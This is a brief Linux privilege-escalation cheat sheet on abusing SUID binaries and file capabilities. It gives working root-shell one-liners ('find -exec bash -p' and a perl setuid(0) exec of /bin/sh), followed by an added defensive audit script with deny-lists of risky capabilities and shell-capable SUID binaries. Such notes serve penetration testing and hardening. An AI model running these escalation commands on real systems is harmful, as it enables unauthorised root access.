Abusing Setuid Binaries and Capabilities

NOTE: Confirm that the utility has the SUID bit set (an "s" in the owner execute position of the permissions, as in -rwsr-xr-x below).

EXAMPLE:

joe@debian-privesc:~$ ls -asl /usr/bin/passwd
64 -rwsr-xr-x 1 root root 63736 Jul 27  2018 /usr/bin/passwd
1. Search for binaries that have file capabilities set

/usr/sbin/getcap -r / 2>/dev/null
2. Search the internet for the vulnerability

3. Exploit the vulnerability following the website's instructions

EXAMPLE:

find /home/joe/Desktop -exec "/usr/bin/bash" -p \;
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
4. Enter commands in the newly spawned shell
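
From the defender's side, the same two enumeration commands can feed an audit that flags the findings this procedure depends on. The script below is an added example, not part of the original page; the function names, the deny-lists and the sample lines are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example: triage SUID and file-capability findings (defender's audit).

# Capabilities treated as root-equivalent on a general-purpose binary.
# The selection is this example's assumption; tune it for your hosts.
RISKY_CAPS='cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner'

# Programs that can run arbitrary commands and so should never be SUID.
# bash, sh, find and perl appear on this page; the rest are assumptions.
NEVER_SUID='bash|sh|dash|find|perl|python[0-9.]*'

# stdin: `getcap -r /` output. stdout: "path<TAB>caps" for risky entries.
# Accepts both libcap layouts: "/p = cap_x+ep" (old) and "/p cap_x=ep" (new).
# Assumes one capability clause per line and no spaces in paths.
flag_risky_caps() {
    awk -v risky="$RISKY_CAPS" '
        NF >= 2 {
            caps = tolower($NF)
            # A clause starting with "=" (e.g. "=ep") grants every capability.
            # Otherwise match whole capability names, which are always
            # preceded by start/comma and followed by "," "+" or "=".
            if (caps ~ /^=/ || ("," caps) ~ (",(" risky ")[,+=]"))
                printf "%s\t%s\n", $1, caps
        }'
}

# stdin: `find / -perm -4000 -type f` output. stdout: paths on the deny-list.
flag_risky_suid() {
    awk -F/ -v never="$NEVER_SUID" '$NF ~ ("^(" never ")$")'
}

# Constructed sample input (not captured from a real host).
sample_getcap() {
    printf '%s\n' '/usr/bin/ping = cap_net_raw+ep' \
        '/usr/bin/perl = cap_setuid+ep' \
        '/usr/bin/perl5.28.1 cap_setuid=ep' \
        '/usr/bin/mtr-packet cap_net_raw=ep'
}
sample_suid() { printf '%s\n' /usr/bin/passwd /usr/bin/find /usr/bin/sudo; }

if [ "${1:-}" = "--scan" ]; then   # live system
    /usr/sbin/getcap -r / 2>/dev/null | flag_risky_caps
    find / -xdev -perm -4000 -type f 2>/dev/null | flag_risky_suid
else                               # offline demo on the samples
    sample_getcap | flag_risky_caps
    sample_suid | flag_risky_suid
fi
```

Run it with `--scan` to audit the live host. A flagged capability can be cleared with `setcap -r <path>` and a stray SUID bit with `chmod u-s <path>`.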
